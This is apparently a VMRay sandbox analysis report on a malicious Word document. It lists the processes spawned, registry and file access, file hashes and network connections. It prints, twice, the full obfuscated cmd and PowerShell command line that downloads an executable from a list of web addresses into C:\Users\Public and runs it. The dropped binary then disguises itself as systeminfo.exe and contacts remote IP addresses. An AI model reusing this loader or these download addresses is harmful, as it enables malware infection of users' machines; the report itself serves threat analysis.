VMRay Analyzer Report for Sample #20386 VMRay Analyzer 2.2.0 URI www.indpts.com Resolved_To Address 108.163.227.35 Process 1 2516 winword.exe 1412 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 2 2768 cmd.exe 2516 cmd.exe CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) C:\Users\aETAdzjz\Desktop\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Process 3 2796 powershell.exe 2768 powershell.exe powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 4 2860 3292.exe 2796 3292.exe "C:\Users\Public\3292.exe" C:\Users\aETAdzjz\Desktop\ c:\users\public\3292.exe Child_Of Opened Process 5 2884 3292.exe 2860 3292.exe "C:\Users\Public\3292.exe" C:\Users\aETAdzjz\Desktop\ c:\users\public\3292.exe Child_Of Created Moved Deleted Opened Process 6 3068 systeminfo.exe 2884 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Opened Process 7 2076 systeminfo.exe 3068 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Child_Of Child_Of Child_Of Created Deleted Deleted Deleted Opened Connected_To Connected_To Connected_To Connected_To Process 8 1016 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Process 9 1652 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Opened Opened Opened Opened Process 10 2712 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Created Created Created Created Created Created Created Opened Opened Opened Opened Process 11 1644 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 12 376 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 13 1496 systeminfo.exe 1260 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Opened Process 14 1948 systeminfo.exe 1496 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Created Opened Created Created Connected_To Connected_To Process 15 984 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe WinRegistryKey Licenses HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 HKEY_CLASSES_ROOT WinRegistryKey win64 INVALID WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\VBA\7.1\Common HKEY_CURRENT_USER RequireDeclaration CompileOnDemand NotifyUserBeforeStateLoss BackGroundCompile BreakOnAllErrors BreakOnServerErrors WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File conout$ File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework64\v2.0.50727\config\machine.config windows\microsoft.net\framework64\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config config File users\public\3292.exe users\public\3292.exe c:\ c:\users\public\3292.exe exe MD5 ca6f2ee0e3b7218da76d126d22f707be SHA1 a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256 b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB DNSRecord www.indpts.com SocketAddress 108.163.227.35 80 TCP NetworkSocket 108.163.227.35 80 TCP Contains SocketAddress www.indpts.com 80 NetworkConnection HTTP www.indpts.com 80 URI www.indpts.com/UHSD/ Contains URI None Mutex XoBZXxTVpSVrDHIx3tCj File Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe C:\ C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe exe MD5 ca6f2ee0e3b7218da76d126d22f707be SHA1 a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256 b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 Moved_To File Users\Public\3292.exe Users\Public\3292.exe C:\ C:\Users\Public\3292.exe exe Moved_From File c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe:zone.identifier File programdata\fb6f.tmp programdata\fb6f.tmp c:\ c:\programdata\fb6f.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\fb2f.tmp programdata\fb2f.tmp c:\ c:\programdata\fb2f.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\fb70.tmp programdata\fb70.tmp c:\ c:\programdata\fb70.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SocketAddress 173.201.20.6 7080 NetworkConnection HTTP 173.201.20.6 7080 SocketAddress 159.203.94.198 8080 NetworkConnection HTTP 159.203.94.198 8080 URI 173.201.20.6 Contains URI 159.203.94.198 Contains File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Clients\Mail\Microsoft Outlook HKEY_LOCAL_MACHINE DLLPathEx MSIApplicationLCID File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat 